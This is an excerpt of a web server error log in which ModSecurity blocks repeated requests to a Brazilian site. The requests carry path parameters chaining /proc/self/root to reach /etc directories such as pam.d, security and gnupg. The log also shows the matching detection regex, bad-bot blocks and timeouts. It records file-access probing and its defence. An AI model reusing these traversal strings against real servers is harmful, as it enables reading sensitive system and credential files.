[uri "/"] [unique_id "abxNCBCii7xarUs8iHYQtwAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:50.373869 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:34842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNCkpm7ZmxKZTM4bZqVAAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:52.207879 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:34856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNDNa6ubjKNq_cu4Z7tAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:53.781691 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:34872] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNDf-YZRR_7pZ7nDKyNwAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:57.949470 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] [client 139.59.3.17:36672] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Thu Mar 19 16:22:58.692237 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:34882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNEv-YZRR_7pZ7nDKyOgAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:23:00.448908 2026] [:error] [pid 8307:tid 140411691570944] [client 74.7.243.128:46580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNFL-FhjpZGs9ba8qQ6wAAAwY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:23:01.225941 2026] [proxy_fcgi:error] [pid 20435:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53724] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:23:01.534792 2026] [:error] [pid 8307:tid 140411691570944] [client 74.7.241.31:33230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNFb-FhjpZGs9ba8qQ7AAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:23:03.179996 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:33246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNF0pm7ZmxKZTM4bZqVwAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:23:06.631722 2026] [:error] [pid 20435:tid 140411557287680] [client 74.7.241.31:33254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNGpJaM1-0uhhUQJM-3gAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:23:14.559260 2026] [:error] [pid 20435:tid 140411557287680] [client 74.7.241.31:59122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNIpJaM1-0uhhUQJM-4AAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:23:22.252635 2026] [:error] [pid 20435:tid 140411557287680] [client 74.7.241.31:59130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNKpJaM1-0uhhUQJM-4gAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:23:24.321829 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:23:28.825611 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:56800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNMEpm7ZmxKZTM4bZqWwAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:23:50.790891 2026] [proxy_fcgi:error] [pid 21563:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54640] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:23:52.307607 2026] [:error] [pid 8307:tid 140411691570944] [client 74.7.243.128:46394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNSL-FhjpZGs9ba8qRDAAAAwY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:23:55.320669 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:47952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNS_u8EFLIOrSqIpvOkgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:23:58.404609 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:60638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNTvu8EFLIOrSqIpvOlAAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:02.770551 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:54590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNUkpm7ZmxKZTM4bZqbwAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:14.168265 2026] [:error] [pid 19655:tid 140411607643904] [client 74.7.241.31:37268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNXk1ujooLWdUDGy76jQAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:18.230051 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.244.43:56318] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxNYvu8EFLIOrSqIpvOmgAAAlc"]
[Thu Mar 19 16:24:20.246572 2026] [proxy_fcgi:error] [pid 7235:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:55174] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:24:22.644141 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:57394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNZsdf6f5d65gmYZSgGQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:29.215116 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:36152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNbfu8EFLIOrSqIpvOnAAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:35.479429 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:36154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNc-oXxyEfFpUF8f8yzAAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:24:36.013150 2026] [:error] [pid 21563:tid 140411699963648] [client 74.7.228.61:36854] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxNdEpm7ZmxKZTM4bZqhgAAA4U"]
[Thu Mar 19 16:24:41.107799 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:48236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNeEpm7ZmxKZTM4bZqiQAAA5E"], referer: 